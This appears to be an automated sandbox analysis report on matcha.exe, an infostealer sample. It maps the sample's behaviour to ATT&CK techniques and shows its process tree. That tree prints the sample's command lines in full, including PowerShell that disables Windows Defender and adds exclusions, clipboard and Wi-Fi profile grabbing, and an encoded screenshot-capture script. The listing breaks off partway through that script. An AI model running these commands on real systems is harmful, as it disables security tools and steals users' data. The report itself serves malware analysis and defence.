43a7d27a20b0e9cc8e36d9662d450d545cb77882427a6a235768034ea993b1d0

Analysis

max time kernel
93s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-01-2025 19:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

matcha.exe
Size

7.1MB
MD5

e82cfe1aa94d7e64413c14900bfbdacd
SHA1

89294a1adcb395716b0e03ebb7089b0ab2c91857
SHA256

43a7d27a20b0e9cc8e36d9662d450d545cb77882427a6a235768034ea993b1d0
SHA512

ca15d5373a54651365be5018b13b668483e754f1fd4d11b7a6d1411bd7ab1014e2f9fd6c20f1b4da8d9851a1688f8a73c09dfebb10af009a250bcf4100a005f8
SSDEEP

98304:EwCIfhvpj/qRsMD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+7tMKzr:ENOpj/cDfyGgqwBdnpkYRMsc8uKpOZ6

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2004	powershell.exe
4132	powershell.exe
4408	powershell.exe
4556	powershell.exe
1396	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	matcha.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3124	powershell.exe
636	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
4516	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe
3256	matcha.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3592	tasklist.exe
4444	tasklist.exe
728	tasklist.exe
1192	tasklist.exe
1604	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1908	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
208	cmd.exe
4752	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4964	cmd.exe
1072	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2084	WMIC.exe
4896	WMIC.exe
2648	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
220	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4752	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2004	powershell.exe
4408	powershell.exe
2004	powershell.exe
4408	powershell.exe
4132	powershell.exe
4132	powershell.exe
3124	powershell.exe
3124	powershell.exe
4296	powershell.exe
4296	powershell.exe
3124	powershell.exe
4296	powershell.exe
4556	powershell.exe
4556	powershell.exe
2624	powershell.exe
2624	powershell.exe
1396	powershell.exe
1396	powershell.exe
5088	powershell.exe
5088	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	4444	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1404	WMIC.exe
Token: SeSecurityPrivilege	1404	WMIC.exe
Token: SeTakeOwnershipPrivilege	1404	WMIC.exe
Token: SeLoadDriverPrivilege	1404	WMIC.exe
Token: SeSystemProfilePrivilege	1404	WMIC.exe
Token: SeSystemtimePrivilege	1404	WMIC.exe
Token: SeProfSingleProcessPrivilege	1404	WMIC.exe
Token: SeIncBasePriorityPrivilege	1404	WMIC.exe
Token: SeCreatePagefilePrivilege	1404	WMIC.exe
Token: SeBackupPrivilege	1404	WMIC.exe
Token: SeRestorePrivilege	1404	WMIC.exe
Token: SeShutdownPrivilege	1404	WMIC.exe
Token: SeDebugPrivilege	1404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1404	WMIC.exe
Token: SeRemoteShutdownPrivilege	1404	WMIC.exe
Token: SeUndockPrivilege	1404	WMIC.exe
Token: SeManageVolumePrivilege	1404	WMIC.exe
Token: 33	1404	WMIC.exe
Token: 34	1404	WMIC.exe
Token: 35	1404	WMIC.exe
Token: 36	1404	WMIC.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeIncreaseQuotaPrivilege	1404	WMIC.exe
Token: SeSecurityPrivilege	1404	WMIC.exe
Token: SeTakeOwnershipPrivilege	1404	WMIC.exe
Token: SeLoadDriverPrivilege	1404	WMIC.exe
Token: SeSystemProfilePrivilege	1404	WMIC.exe
Token: SeSystemtimePrivilege	1404	WMIC.exe
Token: SeProfSingleProcessPrivilege	1404	WMIC.exe
Token: SeIncBasePriorityPrivilege	1404	WMIC.exe
Token: SeCreatePagefilePrivilege	1404	WMIC.exe
Token: SeBackupPrivilege	1404	WMIC.exe
Token: SeRestorePrivilege	1404	WMIC.exe
Token: SeShutdownPrivilege	1404	WMIC.exe
Token: SeDebugPrivilege	1404	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1404	WMIC.exe
Token: SeRemoteShutdownPrivilege	1404	WMIC.exe
Token: SeUndockPrivilege	1404	WMIC.exe
Token: SeManageVolumePrivilege	1404	WMIC.exe
Token: 33	1404	WMIC.exe
Token: 34	1404	WMIC.exe
Token: 35	1404	WMIC.exe
Token: 36	1404	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2084	WMIC.exe
Token: SeSecurityPrivilege	2084	WMIC.exe
Token: SeTakeOwnershipPrivilege	2084	WMIC.exe
Token: SeLoadDriverPrivilege	2084	WMIC.exe
Token: SeSystemProfilePrivilege	2084	WMIC.exe
Token: SeSystemtimePrivilege	2084	WMIC.exe
Token: SeProfSingleProcessPrivilege	2084	WMIC.exe
Token: SeIncBasePriorityPrivilege	2084	WMIC.exe
Token: SeCreatePagefilePrivilege	2084	WMIC.exe
Token: SeBackupPrivilege	2084	WMIC.exe
Token: SeRestorePrivilege	2084	WMIC.exe
Token: SeShutdownPrivilege	2084	WMIC.exe
Token: SeDebugPrivilege	2084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2084	WMIC.exe
Token: SeRemoteShutdownPrivilege	2084	WMIC.exe
Token: SeUndockPrivilege	2084	WMIC.exe
Token: SeManageVolumePrivilege	2084	WMIC.exe
Token: 33	2084	WMIC.exe
Token: 34	2084	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 672 wrote to memory of 3256	672	matcha.exe	83
PID 672 wrote to memory of 3256	672	matcha.exe	83
PID 3256 wrote to memory of 4548	3256	matcha.exe	84
PID 3256 wrote to memory of 4548	3256	matcha.exe	84
PID 3256 wrote to memory of 620	3256	matcha.exe	85
PID 3256 wrote to memory of 620	3256	matcha.exe	85
PID 3256 wrote to memory of 2612	3256	matcha.exe	88
PID 3256 wrote to memory of 2612	3256	matcha.exe	88
PID 3256 wrote to memory of 2092	3256	matcha.exe	90
PID 3256 wrote to memory of 2092	3256	matcha.exe	90
PID 620 wrote to memory of 4408	620	cmd.exe	92
PID 620 wrote to memory of 4408	620	cmd.exe	92
PID 4548 wrote to memory of 2004	4548	cmd.exe	93
PID 4548 wrote to memory of 2004	4548	cmd.exe	93
PID 2612 wrote to memory of 4444	2612	cmd.exe	94
PID 2612 wrote to memory of 4444	2612	cmd.exe	94
PID 2092 wrote to memory of 1404	2092	cmd.exe	95
PID 2092 wrote to memory of 1404	2092	cmd.exe	95
PID 3256 wrote to memory of 2736	3256	matcha.exe	97
PID 3256 wrote to memory of 2736	3256	matcha.exe	97
PID 2736 wrote to memory of 2224	2736	cmd.exe	99
PID 2736 wrote to memory of 2224	2736	cmd.exe	99
PID 3256 wrote to memory of 3568	3256	matcha.exe	100
PID 3256 wrote to memory of 3568	3256	matcha.exe	100
PID 3568 wrote to memory of 1248	3568	cmd.exe	102
PID 3568 wrote to memory of 1248	3568	cmd.exe	102
PID 3256 wrote to memory of 4156	3256	matcha.exe	103
PID 3256 wrote to memory of 4156	3256	matcha.exe	103
PID 4156 wrote to memory of 2084	4156	cmd.exe	105
PID 4156 wrote to memory of 2084	4156	cmd.exe	105
PID 3256 wrote to memory of 688	3256	matcha.exe	106
PID 3256 wrote to memory of 688	3256	matcha.exe	106
PID 688 wrote to memory of 4896	688	cmd.exe	108
PID 688 wrote to memory of 4896	688	cmd.exe	108
PID 3256 wrote to memory of 1908	3256	matcha.exe	155
PID 3256 wrote to memory of 1908	3256	matcha.exe	155
PID 3256 wrote to memory of 1552	3256	matcha.exe	110
PID 3256 wrote to memory of 1552	3256	matcha.exe	110
PID 1908 wrote to memory of 4844	1908	cmd.exe	113
PID 1908 wrote to memory of 4844	1908	cmd.exe	113
PID 1552 wrote to memory of 4132	1552	cmd.exe	114
PID 1552 wrote to memory of 4132	1552	cmd.exe	114
PID 3256 wrote to memory of 4384	3256	matcha.exe	115
PID 3256 wrote to memory of 4384	3256	matcha.exe	115
PID 3256 wrote to memory of 3412	3256	matcha.exe	116
PID 3256 wrote to memory of 3412	3256	matcha.exe	116
PID 3256 wrote to memory of 1428	3256	matcha.exe	119
PID 3256 wrote to memory of 1428	3256	matcha.exe	119
PID 3412 wrote to memory of 1192	3412	cmd.exe	120
PID 3412 wrote to memory of 1192	3412	cmd.exe	120
PID 3256 wrote to memory of 636	3256	matcha.exe	121
PID 3256 wrote to memory of 636	3256	matcha.exe	121
PID 4384 wrote to memory of 728	4384	cmd.exe	122
PID 4384 wrote to memory of 728	4384	cmd.exe	122
PID 3256 wrote to memory of 2124	3256	matcha.exe	124
PID 3256 wrote to memory of 2124	3256	matcha.exe	124
PID 3256 wrote to memory of 2380	3256	matcha.exe	126
PID 3256 wrote to memory of 2380	3256	matcha.exe	126
PID 3256 wrote to memory of 4964	3256	matcha.exe	174
PID 3256 wrote to memory of 4964	3256	matcha.exe	174
PID 3256 wrote to memory of 1960	3256	matcha.exe	130
PID 3256 wrote to memory of 1960	3256	matcha.exe	130
PID 3256 wrote to memory of 4256	3256	matcha.exe	132
PID 3256 wrote to memory of 4256	3256	matcha.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4844	attrib.exe
4192	attrib.exe
2280	attrib.exe

C:\Users\Admin\AppData\Local\Temp\matcha.exe
"C:\Users\Admin\AppData\Local\Temp\matcha.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:672
- C:\Users\Admin\AppData\Local\Temp\matcha.exe
  "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
      4⤵
      Views/modifies file attributes
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1428
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2124
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2380
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4964
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1960
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4256
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAg